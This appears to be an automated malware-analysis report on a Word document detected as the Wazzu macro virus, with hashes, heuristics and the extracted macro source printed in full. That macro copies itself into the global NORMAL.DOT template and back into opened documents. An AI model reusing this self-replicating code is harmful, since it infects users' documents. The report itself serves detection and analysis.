Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeec86d9f46a40d8…

MALICIOUS

Office (OLE)

30.5 KB Created: 1996-10-12 04:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a221a7fd9ef50d606aedc5fd0af569ba SHA-1: 60d2616bf300e3f22f60d1aec923793637b81cf0 SHA-256: eeec86d9f46a40d83de4a425498ac42581951ea3ba28cd3cd04424f74f792e1e
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Wazzu-47', indicating malicious intent. The AutoOpen macro attempts to copy itself to the global template 'NORMAL.DOT', suggesting a persistence mechanism. The macro's functionality is primarily focused on manipulating the document and its template, rather than directly downloading or executing external payloads.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1576 bytes
SHA-256: e41e429d36a191de2ca7bb97b7fb2cce181a625952a7f319d1e1aadc2babe070
Detection
ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Runs AutoOpenScan"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.autoOpen.MAIN"
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    End If

            WordBasic.FileSaveAs Format:=1

GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

End Sub


Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub